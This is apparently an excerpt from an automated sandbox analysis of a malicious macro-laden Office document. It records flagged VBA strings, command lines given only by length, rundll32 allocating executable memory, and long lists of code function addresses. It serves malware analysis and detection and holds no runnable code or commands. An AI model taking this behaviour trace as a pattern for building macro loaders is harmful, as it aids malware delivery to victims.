                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5709
                      Source: unknownProcess created: Commandline size = 5613
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5613Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Czsbnlmzhou\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F7_2_1000976F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B41F7_2_0023B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232C637_2_00232C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002438957_2_00243895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C0C67_2_0023C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023EE787_2_0023EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023568E7_2_0023568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002402C37_2_002402C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002442DA7_2_002442DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002387367_2_00238736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237B637_2_00237B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244B417_2_00244B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024340A7_2_0024340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024687F7_2_0024687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F4447_2_0023F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E05A7_2_0023E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A0AF7_2_0024A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002380BA7_2_002380BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002360B97_2_002360B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002348BD7_2_002348BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024889D7_2_0024889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002388E57_2_002388E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231CFA7_2_00231CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002420C57_2_002420C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F5367_2_0023F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00240D337_2_00240D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023153C7_2_0023153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247D037_2_00247D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B1127_2_0023B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248D1C7_2_00248D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245D1D7_2_00245D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024511B7_2_0024511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002369A07_2_002369A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002461B87_2_002461B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00246DB97_2_00246DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002495867_2_00249586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F98C7_2_0023F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002379987_2_00237998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236D9F7_2_00236D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002431E27_2_002431E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002471EF7_2_002471EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232A307_2_00232A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239A377_2_00239A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234A357_2_00234A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247A0F7_2_00247A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245A617_2_00245A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023EA4C7_2_0023EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002362A37_2_002362A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002312807_2_00231280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002412E27_2_002412E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002426F57_2_002426F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002396CD7_2_002396CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248ADC7_2_00248ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023BB3A7_2_0023BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00240F0C7_2_00240F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242B167_2_00242B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00247F1F7_2_00247F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C7697_2_0023C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00240B687_2_00240B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E3777_2_0023E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002417737_2_00241773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235B797_2_00235B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238F787_2_00238F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249B457_2_00249B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002423497_2_00242349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248F497_2_00248F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002367547_2_00236754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023B75F7_2_0023B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002473AC7_2_002473AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002317AC7_2_002317AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024878F7_2_0024878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023839D7_2_0023839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00243FE77_2_00243FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D7EB7_2_0023D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002467E97_2_002467E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002463C17_2_002463C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241BDF7_2_00241BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239FDC7_2_00239FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EB41F8_2_001EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EEE788_2_001EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E2C638_2_001E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F38958_2_001F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E568E8_2_001E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F42DA8_2_001F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EC0C68_2_001EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F02C38_2_001F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E87368_2_001E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F4B418_2_001F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E7B638_2_001E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F63C18_2_001F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F7A0F8_2_001F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F340A8_2_001F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E9A378_2_001E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E4A358_2_001E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E2A308_2_001E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EE05A8_2_001EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EEA4C8_2_001EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EF4448_2_001EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F687F8_2_001F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5A618_2_001F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F889D8_2_001F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E12808_2_001E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E48BD8_2_001E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E80BA8_2_001E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E60B98_2_001E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001FA0AF8_2_001FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E62A38_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F8ADC8_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E96CD8_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F20C58_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E1CFA8_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F26F58_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E88E58_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F12E28_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F7F1F8_2_001F7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F5D1D8_2_001F5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F8D1C8_2_001F8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F511B8_2_001F511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F2B168_2_001F2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EB1128_2_001EB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0F0C8_2_001F0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F7D038_2_001F7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E153C8_2_001E153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EBB3A8_2_001EBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EF5368_2_001EF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0D338_2_001F0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EB75F8_2_001EB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E67548_2_001E6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F23498_2_001F2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F8F498_2_001F8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F9B458_2_001F9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E8F788_2_001E8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E5B798_2_001E5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EE3778_2_001EE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F17738_2_001F1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EC7698_2_001EC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F0B688_2_001F0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E6D9F8_2_001E6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E839D8_2_001E839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E79988_2_001E7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F878F8_2_001F878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001EF98C8_2_001EF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F95868_2_001F9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F6DB98_2_001F6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F61B88_2_001F61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E17AC8_2_001E17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F73AC8_2_001F73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E69A08_2_001E69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F1BDF8_2_001F1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001E9FDC8_2_001E9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F71EF8_2_001F71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001ED7EB8_2_001ED7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F67E98_2_001F67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F3FE78_2_001F3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F31E28_2_001F31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB41F9_2_001DB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DEE789_2_001DEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D2C639_2_001D2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E38959_2_001E3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D568E9_2_001D568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E42DA9_2_001E42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC0C69_2_001DC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E02C39_2_001E02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D87369_2_001D8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4B419_2_001E4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D7B639_2_001D7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E63C19_2_001E63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7A0F9_2_001E7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E340A9_2_001E340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D4A359_2_001D4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D9A379_2_001D9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D2A309_2_001D2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE05A9_2_001DE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DEA4C9_2_001DEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF4449_2_001DF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E687F9_2_001E687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5A619_2_001E5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E889D9_2_001E889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D12809_2_001D1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D48BD9_2_001D48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D60B99_2_001D60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D80BA9_2_001D80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EA0AF9_2_001EA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D62A39_2_001D62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8ADC9_2_001E8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D96CD9_2_001D96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E20C59_2_001E20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D1CFA9_2_001D1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E26F59_2_001E26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D88E59_2_001D88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E12E29_2_001E12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7F1F9_2_001E7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8D1C9_2_001E8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5D1D9_2_001E5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E511B9_2_001E511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2B169_2_001E2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB1129_2_001DB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0F0C9_2_001E0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7D039_2_001E7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D153C9_2_001D153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DBB3A9_2_001DBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF5369_2_001DF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0D339_2_001E0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB75F9_2_001DB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D67549_2_001D6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E23499_2_001E2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8F499_2_001E8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9B459_2_001E9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D5B799_2_001D5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D8F789_2_001D8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE3779_2_001DE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E17739_2_001E1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC7699_2_001DC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0B689_2_001E0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D839D9_2_001D839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6D9F9_2_001D6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D79989_2_001D7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E878F9_2_001E878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF98C9_2_001DF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E95869_2_001E9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E61B89_2_001E61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6DB99_2_001E6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D17AC9_2_001D17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E73AC9_2_001E73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D69A09_2_001D69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1BDF9_2_001E1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D9FDC9_2_001D9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E71EF9_2_001E71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DD7EB9_2_001DD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E67E99_2_001E67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3FE79_2_001E3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E31E29_2_001E31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027B41F10_2_0027B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00272C6310_2_00272C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027EE7810_2_0027EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027568E10_2_0027568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028389510_2_00283895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027C0C610_2_0027C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002802C310_2_002802C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002842DA10_2_002842DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027873610_2_00278736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00277B6310_2_00277B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00284B4110_2_00284B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002863C110_2_002863C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00279A3710_2_00279A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00274A3510_2_00274A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00272A3010_2_00272A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028340A10_2_0028340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287A0F10_2_00287A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285A6110_2_00285A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028687F10_2_0028687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027F44410_2_0027F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027EA4C10_2_0027EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027E05A10_2_0027E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002762A310_2_002762A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A0AF10_2_0028A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002748BD10_2_002748BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002780BA10_2_002780BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002760B910_2_002760B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027128010_2_00271280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028889D10_2_0028889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002788E510_2_002788E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002812E210_2_002812E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00271CFA10_2_00271CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002826F510_2_002826F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002796CD10_2_002796CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002820C510_2_002820C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00288ADC10_2_00288ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027F53610_2_0027F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027153C10_2_0027153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00280D3310_2_00280D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0027BB3A10_2_0027BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00280F0C10_2_00280F0C
